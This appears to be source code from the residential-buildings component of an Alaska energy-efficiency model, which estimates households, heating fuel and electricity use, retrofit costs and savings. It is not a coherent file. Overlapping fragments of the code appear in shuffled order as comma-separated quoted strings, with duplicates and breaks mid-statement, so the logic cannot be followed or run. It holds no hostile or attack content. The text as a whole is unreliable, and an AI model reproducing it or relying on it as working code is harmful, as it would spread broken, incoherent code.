self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec -", "kWh per 
house']) if not self.intertie_data is None: avg_con = self.intertie_data.get_item( 'Residential Energy", "self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name'] + '_'", "np.array set to baseline values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate", "#~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg", "Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil", "\"\"\"calculate baseline electricity costs Attributes ---------- baseline_kWh_cost : np.array baseline cost of electricity", "self.intertie_data = community_data.intertie_data self.cd = community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\ #~ ix[\"yearly electric", "\"Residential: Heating Propane (gallons/year) Consumption Savings\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\",", "Fuel All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year) Consumption Baseline\": b_oil,", ": np.array proposed cordwood consumption proposed_fuel_LP_consumption : np.array proposed LP consumption proposed_fuel_gas_consumption :", "for each fuel type. 
Attributes ---------- init_HF : float initial heating oil consumption", "= self.comp_specs['min kWh per household'] yr = int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total Occupied'])", "self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh", "= self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed heating fuel consumption", "a year. That's where the 6000.0 # comes from. con_threshold = self.comp_specs['min kWh", "the total energy produced \"\"\" # no electric return self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life]", "def run (self, scalers = {'capital costs':1.0}): \"\"\"Runs the component. The Annual Total", "Biomass (cords/year) Consumption Post Retrofit\", \"Residential: Heating Biomass (cords/year) Consumption Savings\", \"Residential: Electric", "= kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~", "Electric Heat (kWh/year) Cost Savings\": s_elec_cost, \"Residential: Heating Propane (gallons/year) Consumption Baseline\": b_LP,", ": dictionary component specific data for a community. 
Initial value: 'Residential Buildings' section", "- self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption -", "Consumption Savings\": s_bio, \"Residential: Heating Biomass (cords/year) Cost Baseline\": b_bio_cost, \"Residential: Heating Biomass", "forecast self.refit_cost_rate = \\ self.comp_specs['average refit cost'] * \\ community_data.get_item( 'community', 'regional construction", "Gas (Mcf/year) Cost Post Retrofit\": r_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\":", "0: self.proposed_fuel_gas_consumption = 0 # coal,solar, other def calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed", "< con_threshold) or np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\" \"", "module, see information on CommunityData Object aaem.forecast : forecast module, see information on", ": np.array baseline natural gas consumption baseline_fuel_LP_consumption : np.array baseline propane consumption baseline_fuel_kWh_consumption", "other def calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity costs Attributes ---------- baseline_kWh_cost : np.array", "= self.cd['file id'].split('+') if len(tag) > 1 and tag[1] != 'residential': self.was_run =", "* LP_price r_LP_cost = self.proposed_fuel_LP_consumption * LP_price s_LP_cost = b_LP_cost - r_LP_cost b_NG", "\\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh = avg_EUI_reduction", "= np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted += amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh)", "Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), 
\"Residential: Heating", "r_NG b_NG_cost = self.baseline_fuel_gas_consumption * gas_price r_NG_cost = self.proposed_fuel_gas_consumption * gas_price s_NG_cost =", "Gas (Mcf/year) Cost Savings\": s_NG_cost, \"Residential: Total Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net", "Total Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\": self.get_net_benefit(), }, years) try:", "total energy produced \"\"\" # no electric return self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def", "Consumption Baseline\", \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Oil (gallons/year)", "= self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name'] +", "r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec - r_elec b_elec_cost", "= HF_price wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane", "(self): \"\"\"Calculate the baseline kWh consumption for a community Attributes ---------- baseline_kWh_consumption :", "\\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption = \\", "Parameters ---------- directory : path output directory \"\"\" if not self.was_run: return if", "All (MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\":", "no prerequisites leave empty Attributes ---------- diagnostics : diagnostics for tracking error/warning messages", 
"np.float64(rd[\"LP\"]) / 100.0 percent_accounted += amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt", "r_NG_cost years = np.array(range(self.project_life)) + self.start_year df = DataFrame({ \"Residential: Heating Fuel All", "(kWh/year) Consumption Savings\": s_elec, \"Residential: Electric Heat (kWh/year) Cost Baseline\": b_elec_cost, \"Residential: Electric", "b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost = b_oil_cost", "Cost Savings\", \"Residential: Total Cost Savings ($/year)\", \"Residential: Net Benefit ($/year)\" ]] df[\"community\"]", "self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit()", "component of the Alaska Affordable Energy Model: This module estimates the potential improvements", "\"Residential: Heating Oil (gallons/year) Cost Baseline\": b_oil_cost, \"Residential: Heating Oil (gallons/year) Cost Post", "\"\"\"Calculate baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption : np.array baseline heating fuel consumption baseline_fuel_wood_consumption", "Heating Oil (gallons/year) Consumption Baseline\", \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\", \"Residential:", "electric consumption per yer \"\"\" HH = self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH", "Heating Oil (gallons/year) Cost Post Retrofit\", \"Residential: Heating Oil (gallons/year) Cost Savings\", \"Residential:", "average monthly consumption of electricity for a house. 
Attributes ---------- avg_kWh_consumption_per_HH : float", "* HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost = b_oil_cost - r_oil_cost b_bio", "+\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel", "self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit electricity costs Attributes ----------", "have not been retrofit as of 2010, the performance improvements as a percentage", "+ \\ rd[\"Pre-Retrofit Avg Area (SF)\"] * \\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] *", "Cost Baseline\": b_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\": r_NG_cost, \"Residential:", "consumption for residential buildings HH : float a # of houses cf: float", "LP_price r_LP_cost = self.proposed_fuel_LP_consumption * LP_price s_LP_cost = b_LP_cost - r_LP_cost b_NG =", "self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP - r_LP b_LP_cost = self.baseline_fuel_LP_consumption * LP_price r_LP_cost =", "Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential:", "Heating Biomass (cords/year) Consumption Savings\": s_bio, \"Residential: Heating Biomass (cords/year) Cost Baseline\": b_bio_cost,", "= HH * self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption - HH_consumption)", "base line heating fuel costs Attributes ---------- baseline_HF_cost : np.array baseline cost of", "proposed_kWh_cost: np.array proposed electricity cost \"\"\" kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost =", "Biomass (cords/year) Cost Savings\", \"Residential: Electric Heat (kWh/year) Cost Baseline\", \"Residential: Electric Heat", "area * EUI 
self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption =", "(self): \"\"\"Calculate proposed heating cost Attributes ---------- proposed_HF_cost : np.array proposed heating fuel", "import os from aaem.components.annual_savings import AnnualSavings from aaem.community_data import CommunityData from aaem.forecast import", "self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood", "years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\", "Cost Savings ($/year)\", \"Residential: Net Benefit ($/year)\" ]] df[\"community\"] = self.cd['name'] df[\"population\"] =", "= self.cd['propane price'] gas_price = self.cd['natural gas price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption *", "\\ self.proposed_fuel_gas_consumption * gas_price + \\ self.proposed_fuel_LP_consumption * LP_price + \\ self.proposed_fuel_kWh_consumption *", "b_LP, \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\": r_LP, \"Residential: Heating Propane (gallons/year)", "Electric Heat (kWh/year) Consumption Post Retrofit\", \"Residential: Electric Heat (kWh/year) Consumption Savings\", \"Residential:", "component has no prerequisites leave empty Attributes ---------- diagnostics : diagnostics for tracking", "Recovery project for this component to run. 
Parameters ---------- scalers : dictionary of", "self.cd['natural gas price'] else: HF_price = np.nan wood_price = np.nan elec_price = np.nan", "Heat (kWh/year) Consumption Post Retrofit\": r_elec, \"Residential: Electric Heat (kWh/year) Consumption Savings\": s_elec,", "self.savings_other self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas *", "Consumption Post Retrofit\": r_elec, \"Residential: Electric Heat (kWh/year) Consumption Savings\": s_elec, \"Residential: Electric", "+= amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0", "\"Residential: Heating Biomass (cords/year) Cost Baseline\": b_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Post", "There must be a known Heat Recovery project for this component to run.", "and the forecasted price of offset heating fuels. The cost to retrofit each", "default value self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]: #~", "self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost (self): \"\"\"calculate base line heating", "self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0) def", "in each of these function calls is an identity amnt = np.float64(rd[\"Fuel Oil\"])", "(self): \"\"\"Calculate the proposed heating fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption : np.array proposed", ": float total cost of improvements ($) \"\"\" self.capital_costs = self.opportunity_HH * self.refit_cost_rate", "float savings in natural gas fuel 
consumption savings_LP : float savings in propane", "---------- annual_heating_savings : np.array heating savings ($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost - \\", "+\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate the", "/ pop))) def calc_init_consumption (self): \"\"\"Calculate the initial consumption for each fuel type.", "float total savings in mmbtu \"\"\" rd = self.comp_specs['data'] ## #HH self.opportunity_HH =", "= diagnostics() self.intertie_data = community_data.intertie_data self.cd = community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\ #~", "Cost Baseline\": b_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\": r_LP_cost, \"Residential: Heating", ": forecast module, see information on Forecast Object aaem.diagnostics : diagnostics module, see", "first year of the project Attributes ---------- init_HH : int estimated households for", "pre-retrofit consumption, and the forecasted price of offset heating fuels. 
The cost to", "self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg Area", "* constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\", "Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\": self.get_net_benefit(), }, years) try: df =", "consumption total = rd[\"Total Consumption (MMBtu)\"] + \\ rd[\"BEES Total Consumption (MMBtu)\"] +", "as of 2010, the performance improvements as a percentage of the pre-retrofit consumption,", "Heating Propane (gallons/year) Cost Post Retrofit\", \"Residential: Heating Propane (gallons/year) Cost Savings\", \"Residential:", "b_LP_cost - r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG -", "fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price =", "* gas_price + \\ self.baseline_fuel_LP_consumption * LP_price + \\ self.baseline_fuel_kWh_consumption * gas_price #", "See note on accepted scalers Attributes ---------- run : bool True in the", "Oil (gallons/year) Consumption Savings\": s_oil, \"Residential: Heating Oil (gallons/year) Cost Baseline\": b_oil_cost, \"Residential:", "-\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel", ") self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house", "True in the component runs to completion, False 
otherwise reason : string lists", "self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost", "\\ community_data.get_item( 'community', 'regional construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr", "natural gas consumption baseline_fuel_LP_consumption : np.array baseline propane consumption baseline_fuel_kWh_consumption : np.array baseline", "(1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline kWh consumption for a community Attributes", "(MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"]) total = area * EUI #", "project.\" return # needed for electric or HF component and has a default", "r_elec b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price s_elec_cost =", "kWh_cost def calc_capital_costs (self): \"\"\"Calculate the capital costs. 
Attributes ---------- capital_costs : float", "Propane (gallons/year) Cost Baseline\": b_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\": r_LP_cost,", "premium']) wood_price = self.cd['cordwood price'] elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane", "yer \"\"\" HH = self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost (self):", "Heat (kWh/year) Consumption Savings\", \"Residential: Heating Propane (gallons/year) Consumption Baseline\", \"Residential: Heating Propane", "self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline kWh consumption for a", "section of community_data See also -------- aaem.community_data : community data module, see information", "=self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val / self.base_pop))) def run (self, scalers = {'capital", "Gas (Mcf/year) Cost Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\", \"Residential:", "np.array proposed natural gas consumption proposed_fuel_kWh_consumption : np.array proposed electric consumption proposed_HF_consumption :", "Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\", \"Residential: Heating Oil (gallons/year)", ": community data module, see information on CommunityData Object aaem.forecast : forecast module,", "- post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get total energy produced. 
Returns -------", "= self.proposed_fuel_kWh_consumption * elec_price s_elec_cost = b_elec_cost - r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP", "Post Retrofit\": r_LP, \"Residential: Heating Propane (gallons/year) Consumption Savings\": s_LP, \"Residential: Heating Propane", "Heat (kWh/year) Consumption Post Retrofit\", \"Residential: Electric Heat (kWh/year) Consumption Savings\", \"Residential: Heating", "house']) if not self.intertie_data is None: avg_con = self.intertie_data.get_item( 'Residential Energy Efficiency', 'data'", "self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit was negative, setting to 0\" ) ## %", "consumption was \" + str(self.avg_kWh_consumption_per_HH) +\\ \" in \" + str(yr)) def calc_init_HH", "\"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year)", "100.0 HH = self.households #~ print HH area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"])", "be a known Heat Recovery project for this component to run. 
Parameters ----------", "Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\", "r_LP, \"Residential: Heating Propane (gallons/year) Consumption Savings\": s_LP, \"Residential: Heating Propane (gallons/year) Cost", "'data' )['average kWh per house'] #~ self.avg_monthly_consumption = ave_con/12 if (avg_con < con_threshold)", "first year of project \"\"\" val = self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied'] pop", "self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed", "dictionary of valid scalers, optional Scalers to adjust normal run variables. 
See note", "+ '_' +\\ self.component_name.lower() + \"_output.csv\") fname = fname.replace(\" \",\"_\") # save to", "Consumption Baseline\": b_bio, \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\": r_bio, \"Residential: Heating", "\"\"\"calculate annual electric savings created by the project Attributes ---------- annual_electric_savings : np.array", "\"Residential: Heating Oil (gallons/year) Consumption Baseline\": b_oil, \"Residential: Heating Oil (gallons/year) Consumption Post", "Heating Oil (gallons/year) Cost Baseline\", \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\", \"Residential:", "self.diagnostics.add_note(self.component_name, \"Average consumption was \" + str(self.avg_kWh_consumption_per_HH) +\\ \" in \" + str(yr))", "s_elec_cost, \"Residential: Heating Propane (gallons/year) Consumption Baseline\": b_LP, \"Residential: Heating Propane (gallons/year) Consumption", "np.array baseline heating fuel consumption baseline_fuel_wood_consumption : np.array baseline cordwood consumption baseline_fuel_gas_consumption :", "of community_data comp_specs : dictionary component specific data for a community. Initial value:", "produced. 
Returns ------- float the total energy produced \"\"\" # no electric return", "self.was_run = False self.reason = \"Not a residential project.\" return # needed for", "self.cd['cordwood price'] elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price'] gas_price =", "Cost Savings\": s_oil_cost, \"Residential: Heating Biomass (cords/year) Consumption Baseline\": b_bio, \"Residential: Heating Biomass", "self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil - r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost =", "years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\", "\"\"\"Calculate the baseline kWh consumption for a community Attributes ---------- baseline_kWh_consumption : np.array", "baseline heating fuel consumption baseline_fuel_wood_consumption : np.array baseline cordwood consumption baseline_fuel_gas_consumption : np.array", "proposed natural gas consumption proposed_fuel_kWh_consumption : np.array proposed electric consumption proposed_HF_consumption : np.array", "= \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0)", "import CommunityData from aaem.forecast import Forecast from aaem.diagnostics import Diagnostics import aaem.constants as", "Baseline\": b_elec, \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\": r_elec, \"Residential: Electric Heat", "self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 
self.savings_LP", "proposed_fuel_gas_consumption : np.array proposed natural gas consumption proposed_fuel_kWh_consumption : np.array proposed electric consumption", "years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\", "self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val / self.base_pop))) def run (self, scalers", "b_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\": r_NG, \"Residential: Heating Natural", "total, HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 percent_accounted += amnt self.init_wood =", "= self.baseline_fuel_LP_consumption * LP_price r_LP_cost = self.proposed_fuel_LP_consumption * LP_price s_LP_cost = b_LP_cost -", "'community', 'regional construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year'])", "\\ constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption - HH_consumption) * cf) def calc_baseline_fuel_consumption (self):", "df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name'] + '_' +\\ self.component_name.lower()", "* \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\", "kWh consumption for a community Attributes ---------- proposed_kWh_consumption : np.array set to baseline", "\"\"\" base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ 
self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat)", ": np.array heating savings ($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost - \\ self.proposed_HF_cost def", "= self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost (self): \"\"\"calculate base line heating fuel costs", "the forecast to values calculated in this component \"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\", "self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) / \\", "np.array proposed electric consumption proposed_HF_consumption : np.array proposed total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption", "= \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler *", "str(self.avg_kWh_consumption_per_HH) +\\ \" in \" + str(yr)) def calc_init_HH (self): \"\"\"Estimate the #", ": dictionary of valid scalers, optional Scalers to adjust normal run variables. 
See", ": float savings in natural gas fuel consumption savings_LP : float savings in", "self.opportunity_HH = np.float64( self.opportunity_HH ) #~ print self.opportunity_HH if self.opportunity_HH < 0: self.opportunity_HH", "self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf)", "np.array baseline electricity consumption baseline_HF_consumption : np.array baseline total heating fuel consumption \"\"\"", "fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane", "fuel consumption savings_LP : float savings in propane consumption savings_kWh : float savings", "= b_NG_cost - r_NG_cost years = np.array(range(self.project_life)) + self.start_year df = DataFrame({ \"Residential:", "Cost Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\", \"Residential: Heating Natural", "self.percent_savings = np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit", "Gas (Mcf/year) Cost Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\", \"Residential:", "(MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\":", "Consumption Baseline\", \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\", \"Residential: Heating Biomass (cords/year)", "community_data, forecast, diag = None, prerequisites = {}): \"\"\"Class initialiser Parameters ---------- community_data", "propane consumption init_kWh : float initial electric consumption \"\"\" rd = self.comp_specs['data'] ##", "\"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Consumption", "Oil\"]) / 100.0 
self.savings_HF = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1,", "known Heat Recovery project for this component to run. Parameters ---------- scalers :", "savings in heating oil consumption savings_wood : float savings in heating cordwood consumption", "prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric", "\"\"\"Calculate the capital costs. Attributes ---------- capital_costs : float total cost of improvements", "HF_price = (self.diesel_prices + self.cd['heating fuel premium']) self.hoil_price = HF_price wood_price = self.cd['cordwood", "\" in \" + str(yr)) def calc_init_HH (self): \"\"\"Estimate the # of households", "heating cordwood consumption savings_gas : float savings in natural gas fuel consumption savings_LP", "Biomass (cords/year) Consumption Savings\": s_bio, \"Residential: Heating Biomass (cords/year) Cost Baseline\": b_bio_cost, \"Residential:", ": float initial heating cordwood consumption init_gas : float initial natural gas fuel", "Savings\", \"Residential: Electric Heat (kWh/year) Consumption Baseline\", \"Residential: Electric Heat (kWh/year) Consumption Post", "np.float64(rd[\"Wood\"]) / 100.0 percent_accounted += amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt", "information on CommunityData Object aaem.forecast : forecast module, see information on Forecast Object", "\"Residential: Heating Oil (gallons/year) Cost Savings\", \"Residential: 